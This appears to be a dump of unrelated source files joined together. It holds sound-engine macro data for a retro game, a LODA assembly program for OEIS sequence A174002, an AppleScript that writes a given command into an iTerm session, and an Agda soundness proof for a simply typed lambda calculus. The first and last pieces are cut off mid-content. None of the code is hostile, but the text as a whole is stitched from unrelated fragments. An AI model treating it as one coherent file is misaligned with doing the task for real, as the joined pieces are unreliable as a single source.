AUDIO_PULSE_META_NOTE_DUT_VOL(43,1,2,11) CHAN_DUTY(0) WAIT(2) CHAN_VOLUME_LOW(7) WAIT(0) CHAN_VOLUME_LOW(6) WAIT(0) CHAN_VOLUME_LOW(5) WAIT(0) AUDIO_PULSE_META_WAIT_VOL(13,4) AUDIO_PULSE_META_NOTE_DUT_VOL(44,1,2,11) CHAN_DUTY(0) WAIT(2) CHAN_VOLUME_LOW(7) WAIT(0) CHAN_VOLUME_LOW(6) WAIT(0) CHAN_VOLUME_LOW(5) WAIT(0) AUDIO_PULSE_META_WAIT_VOL(13,4) AUDIO_PULSE_META_NOTE_DUT_VOL(46,1,2,11) CHAN_DUTY(0) WAIT(2) CHAN_VOLUME_LOW(7) WAIT(0) CHAN_VOLUME_LOW(6) WAIT(0) CHAN_VOLUME_LOW(5) WAIT(0) CHAN_VOLUME_LOW(4) WAIT(2) AUDIO_PULSE_META_NOTE_DUT_VOL(43,1,2,11) CHAN_DUTY(0) WAIT(2) CHAN_VOLUME_LOW(7) WAIT(0) CHAN_VOLUME_LOW(6) WAIT(0) CHAN_VOLUME_LOW(5) WAIT(0) AUDIO_PULSE_META_WAIT_VOL(13,4) AUDIO_PULSE_META_NOTE_VOL_DSLIDE(39,1,1,0) AUDIO_PULSE_META_WAIT_DUT_VOL(1,1,6) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_VOLUME_HIGH(3) WAIT(4) AUDIO_PULSE_META_WAIT_DSLIDE(1,3) AUDIO_PULSE_META_WAIT_DSLIDE(1,1) SAMPLE_END .) music_adventure_sample_119: .( AUDIO_PULSE_META_NOTE_DUT_VOL(36,1,3,14) CHAN_VOLUME_HIGH(4) PLAY_TIMED_NOTE(0,48) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(5) CHAN_DUTY(2) PLAY_TIMED_NOTE(0,51) AUDIO_PULSE_META_NOTE_DUT_VOL(39,1,3,14) CHAN_VOLUME_HIGH(4) PLAY_TIMED_NOTE(0,51) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(5) CHAN_DUTY(2) PLAY_TIMED_NOTE(0,53) AUDIO_PULSE_META_NOTE_DUT_VOL(41,1,3,14) CHAN_VOLUME_HIGH(4) PLAY_TIMED_NOTE(0,53) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(5) CHAN_DUTY(2) PLAY_TIMED_NOTE(0,48) AUDIO_PULSE_META_NOTE_DUT_VOL(36,1,3,14) CHAN_VOLUME_HIGH(4) PLAY_TIMED_NOTE(0,48) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(7) WAIT(7) CHAN_DUTY(2) PLAY_TIMED_NOTE(0,48) AUDIO_PULSE_META_NOTE_DUT_VOL(36,1,3,14) CHAN_VOLUME_HIGH(4) PLAY_TIMED_NOTE(0,48) CHAN_VOLUME_HIGH(1) WAIT(2) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(7) WAIT(5) CHAN_DUTY(2) PLAY_TIMED_NOTE(0,48) AUDIO_PULSE_META_NOTE_DUT_VOL(36,1,3,14) CHAN_VOLUME_HIGH(4) PLAY_TIMED_NOTE(0,48) CHAN_VOLUME_HIGH(1) WAIT(2) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(3) SAMPLE_END .) music_adventure_sample_120: .( AUDIO_PULSE_META_NOTE_DUT_VOL(48,1,2,15) AUDIO_PULSE_META_NOTE_DUT_VOL(36,1,3,14) CHAN_VOLUME_HIGH(4) PLAY_TIMED_NOTE(0,48) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(5) CHAN_DUTY(2) PLAY_TIMED_NOTE(0,51) AUDIO_PULSE_META_NOTE_DUT_VOL(39,1,3,14) CHAN_VOLUME_HIGH(4) PLAY_TIMED_NOTE(0,51) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(5) CHAN_DUTY(2) PLAY_TIMED_NOTE(0,53) AUDIO_PULSE_META_NOTE_DUT_VOL(41,1,3,14) CHAN_VOLUME_HIGH(4) PLAY_TIMED_NOTE(0,53) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(5) CHAN_DUTY(2) PLAY_TIMED_NOTE(0,48) AUDIO_PULSE_META_NOTE_DUT_VOL(36,1,3,14) CHAN_VOLUME_HIGH(4) PLAY_TIMED_NOTE(0,48) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(7) WAIT(7) CHAN_DUTY(2) PLAY_TIMED_NOTE(0,48) AUDIO_PULSE_META_NOTE_DUT_VOL(36,1,3,14) CHAN_VOLUME_HIGH(4) PLAY_TIMED_NOTE(0,48) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(7) WAIT(7) CHAN_DUTY(2) PLAY_TIMED_NOTE(0,48) AUDIO_PULSE_META_NOTE_DUT_VOL(36,1,3,14) CHAN_VOLUME_HIGH(4) PLAY_TIMED_NOTE(0,48) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(5) CHAN_DUTY(2) PLAY_TIMED_NOTE(0,48) SAMPLE_END .) music_adventure_sample_121: .( AUDIO_PULSE_META_NOTE_DUT_VOL(48,1,2,15) SAMPLE_END .) music_adventure_sample_122: .( CHAN_DUTY(2) PLAY_TIMED_NOTE(0,46) AUDIO_PULSE_META_NOTE_DUT_VOL(34,1,3,14) CHAN_VOLUME_HIGH(4) PLAY_TIMED_NOTE(0,46) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(5) CHAN_DUTY(2) PLAY_TIMED_NOTE(0,48) AUDIO_PULSE_META_NOTE_DUT_VOL(36,1,3,14) CHAN_VOLUME_HIGH(4) PLAY_TIMED_NOTE(0,48) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(5) CHAN_DUTY(2) PLAY_TIMED_NOTE(0,51) AUDIO_PULSE_META_NOTE_DUT_VOL(39,1,3,14) CHAN_VOLUME_HIGH(4) PLAY_TIMED_NOTE(0,51) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(5) CHAN_DUTY(2) PLAY_TIMED_NOTE(0,46) AUDIO_PULSE_META_NOTE_DUT_VOL(34,1,3,14) CHAN_VOLUME_HIGH(4) PLAY_TIMED_NOTE(0,46) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(7) WAIT(7) CHAN_DUTY(2) PLAY_TIMED_NOTE(0,46) AUDIO_PULSE_META_NOTE_DUT_VOL(34,1,3,14) CHAN_VOLUME_HIGH(4) PLAY_TIMED_NOTE(0,46) CHAN_VOLUME_HIGH(1) WAIT(2) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(7) WAIT(5) CHAN_DUTY(2) PLAY_TIMED_NOTE(0,46) AUDIO_PULSE_META_NOTE_DUT_VOL(34,1,3,14) CHAN_VOLUME_HIGH(4) PLAY_TIMED_NOTE(0,46) CHAN_VOLUME_HIGH(1) WAIT(2) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(3) SAMPLE_END .) music_adventure_sample_123: .( CHAN_DUTY(2) PLAY_TIMED_NOTE(0,44) AUDIO_PULSE_META_NOTE_DUT_VOL(32,1,3,14) CHAN_VOLUME_HIGH(4) PLAY_TIMED_NOTE(0,44) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(5) CHAN_DUTY(2) PLAY_TIMED_NOTE(0,46) AUDIO_PULSE_META_NOTE_DUT_VOL(34,1,3,14) CHAN_VOLUME_HIGH(4) PLAY_TIMED_NOTE(0,46) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(5) CHAN_DUTY(2) PLAY_TIMED_NOTE(0,48) AUDIO_PULSE_META_NOTE_DUT_VOL(36,1,3,14) CHAN_VOLUME_HIGH(4) PLAY_TIMED_NOTE(0,48) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(7) WAIT(7) CHAN_DUTY(2) PLAY_TIMED_NOTE(0,43) AUDIO_PULSE_META_NOTE_DUT_VOL(31,1,3,14) CHAN_VOLUME_HIGH(4) PLAY_TIMED_NOTE(0,43) CHAN_VOLUME_HIGH(1) WAIT(0) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(5) CHAN_DUTY(2) PLAY_TIMED_NOTE(0,44) AUDIO_PULSE_META_NOTE_DUT_VOL(32,1,3,14) CHAN_VOLUME_HIGH(4) PLAY_TIMED_NOTE(0,44) CHAN_VOLUME_HIGH(1) WAIT(2) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(3) CHAN_DUTY(2) PLAY_TIMED_NOTE(0,46) AUDIO_PULSE_META_NOTE_DUT_VOL(34,1,3,14) CHAN_VOLUME_HIGH(4) PLAY_TIMED_NOTE(0,46) CHAN_VOLUME_HIGH(1) WAIT(2) CHAN_DUTY(0) CHAN_VOLUME_HIGH(7) HALT(7) WAIT(5) SAMPLE_END .) music_adventure_sample_124: .( AUDIO_PULSE_META_NOTE_DUT_VOL(12,1,2,11) CHAN_DUTY(0) WAIT(2) CHAN_VOLUME_LOW(7) WAIT(0) CHAN_VOLUME_LOW(6) WAIT(0) CHAN_VOLUME_LOW(5) WAIT(0) CHAN_VOLUME_LOW(4) WAIT(2) AUDIO_PULSE_META_WAIT_DUT_VOL(1,2,11) CHAN_DUTY(0) WAIT(2) CHAN_VOLUME_LOW(7) WAIT(0) CHAN_VOLUME_LOW(6) WAIT(0) CHAN_VOLUME_LOW(5) WAIT(0) CHAN_VOLUME_LOW(4) WAIT(2) CHAN_VOLUME_HIGH(7) HALT(7) WAIT(1) AUDIO_PULSE_META_NOTE_DUT_VOL(12,1,2,11) CHAN_DUTY(0) WAIT(2) CHAN_VOLUME_LOW(7) WAIT(0) CHAN_VOLUME_LOW(6) WAIT(0) CHAN_VOLUME_LOW(5) WAIT(0) CHAN_VOLUME_LOW(4) WAIT(2) CHAN_VOLUME_HIGH(7) HALT(7) WAIT(1) AUDIO_PULSE_META_NOTE_DUT_VOL(12,1,2,11) CHAN_DUTY(0) WAIT(2) CHAN_VOLUME_LOW(7) WAIT(0) CHAN_VOLUME_LOW(6) WAIT(0) CHAN_VOLUME_LOW(5) WAIT(0) CHAN_VOLUME_LOW(4) WAIT(2) AUDIO_PULSE_META_WAIT_DUT_VOL(1,2,11) CHAN_DUTY(0) WAIT(2) CHAN_VOLUME_LOW(7) WAIT(0) CHAN_VOLUME_LOW(6) WAIT(0) CHAN_VOLUME_LOW(5) WAIT(0) CHAN_VOLUME_LOW(4) WAIT(2) AUDIO_PULSE_META_NOTE_DUT_VOL(15,1,2,11) CHAN_DUTY(0) WAIT(2) CHAN_VOLUME_LOW(7) WAIT(0) CHAN_VOLUME_LOW(6) WAIT(0) CHAN_VOLUME_LOW(5) WAIT(0) SAMPLE_END .) music_adventure_sample_125: .( CHAN_VOLUME_LOW(4) WAIT(2) SAMPLE_END .) music_adventure_sample_126: .( CHAN_VOLUME_LOW(4) WAIT(1) SAMPLE_END .) music_adventure_sample_127: .( CHAN_DUTY(0) WAIT(2) CHAN_VOLUME_LOW(7) WAIT(0) CHAN_VOLUME_LOW(6) WAIT(0) CHAN_VOLUME_LOW(5) WAIT(0) CHAN_VOLUME_LOW(4) WAIT(2) AUDIO_PULSE_META_WAIT_DUT_VOL(1,2,11) CHAN_DUTY(0) WAIT(2) CHAN_VOLUME_LOW(7) WAIT(0) CHAN_VOLUME_LOW(6) WAIT(0) CHAN_VOLUME_LOW(5) WAIT(0) CHAN_VOLUME_LOW(4) WAIT(2) CHAN_VOLUME_HIGH(7) HALT(7) WAIT(1) AUDIO_PULSE_META_NOTE_DUT_VOL(17,1,2,11) CHAN_DUTY(0) WAIT(2) CHAN_VOLUME_LOW(7) WAIT(0) CHAN_VOLUME_LOW(6) WAIT(0) CHAN_VOLUME_LOW(5) WAIT(0) CHAN_VOLUME_LOW(4) WAIT(2) CHAN_VOLUME_HIGH(7) HALT(7) WAIT(1) AUDIO_PULSE_META_NOTE_DUT_VOL(17,1,2,11) CHAN_DUTY(0) WAIT(2) CHAN_VOLUME_LOW(7) WAIT(0) CHAN_VOLUME_LOW(6) WAIT(0) CHAN_VOLUME_LOW(5) WAIT(0) CHAN_VOLUME_LOW(4) WAIT(2) AUDIO_PULSE_META_WAIT_DUT_VOL(1,2,11) CHAN_DUTY(0) WAIT(2) CHAN_VOLUME_LOW(7) WAIT(0) CHAN_VOLUME_LOW(6) WAIT(0) CHAN_VOLUME_LOW(5) WAIT(0) CHAN_VOLUME_LOW(4) WAIT(2) AUDIO_PULSE_META_WAIT_DUT_VOL(1,2,11) CHAN_DUTY(0) WAIT(2) CHAN_VOLUME_LOW(7) WAIT(0) CHAN_VOLUME_LOW(6) WAIT(0) CHAN_VOLUME_LOW(5) WAIT(0) CHAN_VOLUME_LOW(4) WAIT(2) SAMPLE_END .) music_adventure_sample_128: .( AUDIO_PULSE_META_NOTE_DUT_VOL_DSLIDE(17,1,2,11,0) SAMPLE_END .) music_adventure_sample_129: .( AUDIO_PULSE_META_WAIT_USLIDE(2,-1) AUDIO_PULSE_META_WAIT_DSLIDE(2,0) SAMPLE_END .)
programs/oeis/174/A174002.asm	karttu/loda	1	169717	; A174002: a(n) = n*binomial(n+4, 4). ; 0,5,30,105,280,630,1260,2310,3960,6435,10010,15015,21840,30940,42840,58140,77520,101745,131670,168245,212520,265650,328900,403650,491400,593775,712530,849555,1006880,1186680,1391280,1623160,1884960,2179485 add $0,4 mov $1,$0 bin $1,5 mul $1,5
apple-scripts/iTermLegacy/iTerm-legacy-current-window.applescript	desynced/legendary-octo-broccoli	0	4069	--for testing uncomment the "on run" block --on run -- set argsCmd to "ps aux \| grep [s]sh" -- scriptRun(argsCmd) --end run on scriptRun(argsCmd) set withCmd to (argsCmd) CommandRun(withCmd) end scriptRun on CommandRun(withCmd) tell application "iTerm" if it is running then tell the current terminal tell the current session reopen activate write text withCmd end tell end tell else tell the current terminal tell the current session write text withCmd activate end tell end tell end if end tell end CommandRun
src/STLC/Coquand/Soundness.agda	mietek/coquand-kovacs	0	6408	<filename>src/STLC/Coquand/Soundness.agda module STLC.Coquand.Soundness where open import STLC.Coquand.Completeness public -------------------------------------------------------------------------------- -- Un⟦_⟧ postulate ⟦_⟧Un : ∀ {Γ Ξ A} → {ρ : Γ ⊩⋆ Ξ} → (M : Ξ ⊢ A) → Un⋆ ρ → Un (⟦ M ⟧ ρ) -- 𝒰⋆⟦_⟧ₛ postulate ⟦_⟧Un⋆ : ∀ {Γ Ξ Φ} → {ρ : Γ ⊩⋆ Ξ} → (σ : Ξ ⊢⋆ Φ) → Un⋆ ρ → Un⋆ (⟦ σ ⟧⋆ ρ) postulate ⟦_⟧Eq : ∀ {Γ Ξ A} → {ρ₁ ρ₂ : Γ ⊩⋆ Ξ} → (M : Ξ ⊢ A) → Eq⋆ ρ₁ ρ₂ → Un⋆ ρ₁ → Un⋆ ρ₂ → Eq (⟦ M ⟧ ρ₁) (⟦ M ⟧ ρ₂) -- Eq⋆⟦_⟧ₛ postulate ⟦_⟧Eq⋆ : ∀ {Γ Ξ Φ} → {ρ₁ ρ₂ : Γ ⊩⋆ Ξ} → (σ : Ξ ⊢⋆ Φ) → Eq⋆ ρ₁ ρ₂ → Un⋆ ρ₁ → Un⋆ ρ₂ → Eq⋆ (⟦ σ ⟧⋆ ρ₁) (⟦ σ ⟧⋆ ρ₂) -------------------------------------------------------------------------------- -- ⟦_⟧⬗Eq = symEq ∘ ↑⟨_⟩Eq⟦_⟧ ⟦_⟧⬗Eq : ∀ {Γ Γ′ Ξ A} → {ρ : Γ ⊩⋆ Ξ} → (M : Ξ ⊢ A) (η : Γ′ ∋⋆ Γ) → Un⋆ ρ → Eq (⟦ M ⟧ (η ⬗ ρ)) (acc η (⟦ M ⟧ ρ)) ⟦_⟧⬗Eq (𝓋 i) η υ = get⬗Eq η i υ ⟦_⟧⬗Eq (ƛ M) η υ = eq⊃ (λ η′ u → ⟦ M ⟧Eq (comp⬗◇Eq⋆ η′ η υ , reflEq u) (cong⬗Un⋆ η′ (cong⬗Un⋆ η υ) , u) (cong⬗Un⋆ (η′ ○ η) υ , u)) ⟦_⟧⬗Eq (M ∙ N) η υ = cong⟦∙⟧Eq idᵣ (⟦ M ⟧⬗Eq η υ) (⟦ M ⟧Un (cong⬗Un⋆ η υ)) (congaccUn η (⟦ M ⟧Un υ)) (⟦ N ⟧⬗Eq η υ) (⟦ N ⟧Un (cong⬗Un⋆ η υ)) (congaccUn η (⟦ N ⟧Un υ)) ⦙ acc⟦∙⟧idEq η (⟦ M ⟧Un υ) (congaccUn η (⟦ N ⟧Un υ)) ⦙ (cong⟦∙⟧Eq η ((lidaccEq (⟦ M ⟧Un υ)) ⁻¹) (⟦ M ⟧Un υ) (congaccUn idᵣ (⟦ M ⟧Un υ)) (reflEq (congaccUn η (⟦ N ⟧Un υ))) (congaccUn η (⟦ N ⟧Un υ)) (congaccUn η (⟦ N ⟧Un υ)) ⦙ acc⟦∙⟧Eq idᵣ η (⟦ M ⟧Un υ) (⟦ N ⟧Un υ)) -- ⟦_⟧⬗Eq⋆ = symEq ∘ ↑⟨_⟩Eq⋆⟦_⟧ₛ ⟦_⟧⬗Eq⋆ : ∀ {Γ Γ′ Ξ Φ} → {ρ : Γ ⊩⋆ Ξ} → (σ : Ξ ⊢⋆ Φ) (η : Γ′ ∋⋆ Γ) → Un⋆ ρ → Eq⋆ (⟦ σ ⟧⋆ (η ⬗ ρ)) (η ⬗ ⟦ σ ⟧⋆ ρ) ⟦_⟧⬗Eq⋆ ∅ η υ = ∅ ⟦_⟧⬗Eq⋆ (σ , M) η υ = ⟦ σ ⟧⬗Eq⋆ η υ , ⟦ M ⟧⬗Eq η υ -------------------------------------------------------------------------------- -- TODO: Generalise to zap⬖ postulate aux₄₈₁ : ∀ {Γ Ξ A} → {ρ : Γ ⊩⋆ Ξ} {a : Γ ⊩ A} → Un⋆ ρ → Eq⋆ ((ρ , a) ⬖ wkᵣ idᵣ) ρ -- TODO -- Basic properties of _◇_ -- Advanced properties of _◇_ -- Basic properties of _⬗_ -- Basic properties of _◆_ -- Advanced properties of _⬗_ -- Advanced properties of _◆_ -- TODO: Fix the instance argument problem; abstract over models; rename η to ξ… -------------------------------------------------------------------------------- renlift⟦_⟧Eq : ∀ {Γ Γ′ A B w w′} → {ρ : w ⊩⋆ Γ′} {a : w′ ⊩ A} → (M : Γ , A ⊢ B) (η₁ : Γ′ ∋⋆ Γ) (η₂ : w′ ∋⋆ w) → Un⋆ ρ → Un a → Eq (⟦ ren (liftᵣ {A} η₁) M ⟧ (η₂ ⬗ ρ , a)) (⟦ M ⟧ (η₂ ⬗ (ρ ⬖ η₁) , a)) renlift⟦_⟧Eq (𝓋 zero) η₁ η₂ υ u = reflEq u renlift⟦_⟧Eq {ρ = ρ} {a} (𝓋 (suc i)) η₁ η₂ υ u = ≡→Eq ((getᵥ (η₂ ⬗ ρ , a)) & natgetᵣ η₁ i) (conggetUn (getᵣ (wkᵣ η₁) i) (cong⬗Un⋆ η₂ υ , u)) ⦙ get⬖Eq η₁ (getᵣ η₁ i) i (cong⬗Un⋆ η₂ υ) ⁻¹ ⦙ conggetEq i (comp⬗⬖Eq⋆ η₂ η₁ υ ⁻¹) renlift⟦_⟧Eq (ƛ M) η₁ η₂ υ u = eq⊃ (λ η′ u′ → renlift⟦ M ⟧Eq (liftᵣ η₁) η′ (cong⬗Un⋆ η₂ υ , u) u′ ⦙ ⟦ M ⟧Eq ( ( cong⬗Eq⋆ η′ (( comp⬗⬖Eq⋆ η₂ η₁ υ ⦙ zap⬖Eq⋆ (wkᵣ η₁) η₁ (cong⬗Un⋆ η₂ υ) ⁻¹ ) ⁻¹) , reflEq (congaccUn η′ u) ) , reflEq u′ ) ((cong⬗Un⋆ η′ (cong⬖Un⋆ (wkᵣ η₁) (cong⬗Un⋆ η₂ υ , u)) , congaccUn η′ u) , u′) ((cong⬗Un⋆ η′ (cong⬗Un⋆ η₂ (cong⬖Un⋆ η₁ υ)) , congaccUn η′ u) , u′)) renlift⟦_⟧Eq (M ∙ N) η₁ η₂ υ u = cong⟦∙⟧Eq idᵣ (renlift⟦ M ⟧Eq η₁ η₂ υ u) (⟦ ren (liftᵣ η₁) M ⟧Un (cong⬗Un⋆ η₂ υ , u)) (⟦ M ⟧Un (cong⬗Un⋆ η₂ (cong⬖Un⋆ η₁ υ) , u)) (renlift⟦ N ⟧Eq η₁ η₂ υ u) (⟦ ren (liftᵣ η₁) N ⟧Un (cong⬗Un⋆ η₂ υ , u)) (⟦ N ⟧Un (cong⬗Un⋆ η₂ (cong⬖Un⋆ η₁ υ) , u)) -------------------------------------------------------------------------------- renwk⟦_⟧Eq : ∀ {Γ Γ′ A C w} → {ρ : w ⊩⋆ Γ′} {a : w ⊩ A} → (M : Γ ⊢ C) (η : Γ′ ∋⋆ Γ) → Un⋆ ρ → Un a → Eq (⟦ ren (wkᵣ {A} η) M ⟧ (ρ , a)) (⟦ M ⟧ (ρ ⬖ η)) renwk⟦_⟧Eq (𝓋 i) η υ u = get⬖Eq (wkᵣ η) (getᵣ (wkᵣ η) i) i (υ , u) ⁻¹ ⦙ conggetEq i (zap⬖Eq⋆ (wkᵣ η) η υ) renwk⟦_⟧Eq (ƛ M) η υ u = eq⊃ (λ η′ u′ → renlift⟦ M ⟧Eq (wkᵣ η) η′ (υ , u) u′ ⦙ ⟦ M ⟧Eq (cong⬗Eq⋆ η′ (zap⬖Eq⋆ (wkᵣ η) η υ) , reflEq u′) (cong⬗Un⋆ η′ (cong⬖Un⋆ (wkᵣ η) (υ , u)) , u′) (cong⬗Un⋆ η′ (cong⬖Un⋆ η υ) , u′)) renwk⟦_⟧Eq (M ∙ N) η υ u = cong⟦∙⟧Eq idᵣ (renwk⟦ M ⟧Eq η υ u) (⟦ ren (wkᵣ η) M ⟧Un (υ , u)) (⟦ M ⟧Un (cong⬖Un⋆ η υ)) (renwk⟦ N ⟧Eq η υ u) (⟦ ren (wkᵣ η) N ⟧Un (υ , u)) (⟦ N ⟧Un (cong⬖Un⋆ η υ)) -------------------------------------------------------------------------------- wk⟦_⟧Eq : ∀ {Γ A C w} → {ρ : w ⊩⋆ Γ} {a : w ⊩ A} → (M : Γ ⊢ C) → Un⋆ ρ → Un a → Eq (⟦ wk {A} M ⟧ (ρ , a)) (⟦ M ⟧ ρ) wk⟦_⟧Eq M υ u = renwk⟦ M ⟧Eq idᵣ υ u ⦙ ⟦ M ⟧Eq (rid⬖Eq⋆ υ) (cong⬖Un⋆ idᵣ υ) υ wk⟦_⟧Eq⋆ : ∀ {Γ Ξ A w} → {ρ : w ⊩⋆ Γ} {a : w ⊩ A} → (σ : Γ ⊢⋆ Ξ) → Un⋆ ρ → Un a → Eq⋆ (⟦ wkₛ {A} σ ⟧⋆ (ρ , a)) (⟦ σ ⟧⋆ ρ) wk⟦_⟧Eq⋆ ∅ υ u = ∅ wk⟦_⟧Eq⋆ (σ , M) υ u = wk⟦ σ ⟧Eq⋆ υ u , wk⟦ M ⟧Eq υ u -------------------------------------------------------------------------------- get⟦_⟧Eq : ∀ {Γ Ξ A w} → {ρ : w ⊩⋆ Γ} → (σ : Γ ⊢⋆ Ξ) (i : Ξ ∋ A) → Un⋆ ρ → Eq (⟦ getₛ σ i ⟧ ρ) (getᵥ (⟦ σ ⟧⋆ ρ) i) get⟦_⟧Eq (σ , M) zero υ = reflEq (⟦ M ⟧Un υ) get⟦_⟧Eq (σ , M) (suc i) υ = get⟦ σ ⟧Eq i υ -------------------------------------------------------------------------------- sublift⟦_⟧Eq : ∀ {Γ Ξ A B w} → {ρ : w ⊩⋆ Γ} {a : w ⊩ A} → (M : Ξ , A ⊢ B) (σ : Γ ⊢⋆ Ξ) → Un⋆ ρ → Un a → Eq (⟦ sub (liftₛ {A} σ) M ⟧ (ρ , a)) (⟦ M ⟧ (⟦ σ ⟧⋆ ρ , a)) sublift⟦_⟧Eq (𝓋 zero) σ υ u = reflEq u sublift⟦_⟧Eq {ρ = ρ} {a} (𝓋 (suc i)) σ υ u = ≡→Eq ((λ M′ → ⟦ M′ ⟧ (ρ , a)) & natgetₛ σ i) (⟦ getₛ (wkₛ σ) i ⟧Un (υ , u)) ⦙ wk⟦ getₛ σ i ⟧Eq υ u ⦙ get⟦ σ ⟧Eq i υ sublift⟦_⟧Eq (ƛ M) σ υ u = eq⊃ (λ η′ u′ → sublift⟦ M ⟧Eq (liftₛ σ) (cong⬗Un⋆ η′ υ , congaccUn η′ u) u′ ⦙ ⟦ M ⟧Eq ((⟦ wkₛ σ ⟧⬗Eq⋆ η′ (υ , u) , reflEq (congaccUn η′ u)) , reflEq u′) ((⟦ wkₛ σ ⟧Un⋆ (cong⬗Un⋆ η′ υ , congaccUn η′ u) , congaccUn η′ u) , u′) ((cong⬗Un⋆ η′ (⟦ wkₛ σ ⟧Un⋆ (υ , u)) , congaccUn η′ u) , u′) ⦙ ⟦ M ⟧Eq ((cong⬗Eq⋆ η′ (wk⟦ σ ⟧Eq⋆ υ u) , reflEq (congaccUn η′ u)) , reflEq u′) ((cong⬗Un⋆ η′ (⟦ wkₛ σ ⟧Un⋆ (υ , u)) , congaccUn η′ u) , u′) ((cong⬗Un⋆ η′ (⟦ σ ⟧Un⋆ υ) , congaccUn η′ u) , u′)) sublift⟦_⟧Eq (M ∙ N) σ υ u = cong⟦∙⟧Eq idᵣ (sublift⟦ M ⟧Eq σ υ u) (⟦ sub (liftₛ σ) M ⟧Un (υ , u)) (⟦ M ⟧Un (⟦ σ ⟧Un⋆ υ , u)) (sublift⟦ N ⟧Eq σ υ u) (⟦ sub (liftₛ σ) N ⟧Un (υ , u)) (⟦ N ⟧Un (⟦ σ ⟧Un⋆ υ , u)) -------------------------------------------------------------------------------- subliftwk⟦_⟧Eq : ∀ {Γ Ξ A A′ B w w′} → {ρ : w ⊩⋆ Γ} {a : w ⊩ A} {a′ : w′ ⊩ A′} → (M : Ξ , A′ ⊢ B) (σ : Γ ⊢⋆ Ξ) (η : w′ ∋⋆ w) → Un⋆ ρ → Un a → Un a′ → Eq (⟦ sub (liftₛ (wkₛ σ)) M ⟧ (η ⬗ ρ , acc η a , a′)) (⟦ sub (liftₛ σ) M ⟧ (η ⬗ ρ , a′)) subliftwk⟦_⟧Eq M σ η υ u u′ = sublift⟦ M ⟧Eq (wkₛ σ) (cong⬗Un⋆ η υ , congaccUn η u) u′ ⦙ ⟦ M ⟧Eq (wk⟦ σ ⟧Eq⋆ (cong⬗Un⋆ η υ) (congaccUn η u) , reflEq u′) (⟦ wkₛ σ ⟧Un⋆ (cong⬗Un⋆ η υ , congaccUn η u) , u′) (⟦ σ ⟧Un⋆ (cong⬗Un⋆ η υ) , u′) ⦙ sublift⟦ M ⟧Eq σ (cong⬗Un⋆ η υ) u′ ⁻¹ -------------------------------------------------------------------------------- subwk⟦_⟧Eq : ∀ {Γ Ξ A C w} → {ρ : w ⊩⋆ Γ} {a : w ⊩ A} → (M : Ξ ⊢ C) (σ : Γ ⊢⋆ Ξ) → Un⋆ ρ → Un a → Eq (⟦ sub (wkₛ {A} σ) M ⟧ (ρ , a)) (⟦ sub σ M ⟧ ρ) subwk⟦_⟧Eq {ρ = ρ} {a} (𝓋 i) σ υ u = ≡→Eq ((λ M′ → ⟦ M′ ⟧ (ρ , a)) & (natgetₛ σ i)) (⟦ getₛ (wkₛ σ) i ⟧Un (υ , u)) ⦙ wk⟦ getₛ σ i ⟧Eq υ u subwk⟦_⟧Eq (ƛ {A = A′} M) σ υ u = eq⊃ (λ η u′ → subliftwk⟦ M ⟧Eq σ η υ u u′) subwk⟦_⟧Eq (M ∙ N) σ υ u = cong⟦∙⟧Eq idᵣ (subwk⟦ M ⟧Eq σ υ u) (⟦ sub (wkₛ σ) M ⟧Un (υ , u)) (⟦ sub σ M ⟧Un υ) (subwk⟦ N ⟧Eq σ υ u) (⟦ sub (wkₛ σ) N ⟧Un (υ , u)) (⟦ sub σ N ⟧Un υ) -------------------------------------------------------------------------------- sub⟦_⟧Eq : ∀ {Γ Ξ A w} → {ρ : w ⊩⋆ Γ} → (M : Ξ ⊢ A) (σ : Γ ⊢⋆ Ξ) → Un⋆ ρ → Eq (⟦ sub σ M ⟧ ρ) (⟦ M ⟧ (⟦ σ ⟧⋆ ρ)) sub⟦_⟧Eq (𝓋 i) σ υ = get⟦ σ ⟧Eq i υ sub⟦_⟧Eq (ƛ M) σ υ = eq⊃ (λ η u → sublift⟦ M ⟧Eq σ (cong⬗Un⋆ η υ) u ⦙ ⟦ M ⟧Eq (⟦ σ ⟧⬗Eq⋆ η υ , reflEq u) (⟦ σ ⟧Un⋆ (cong⬗Un⋆ η υ) , u) (cong⬗Un⋆ η (⟦ σ ⟧Un⋆ υ) , u)) sub⟦_⟧Eq (M ∙ N) σ υ = cong⟦∙⟧Eq idᵣ (sub⟦ M ⟧Eq σ 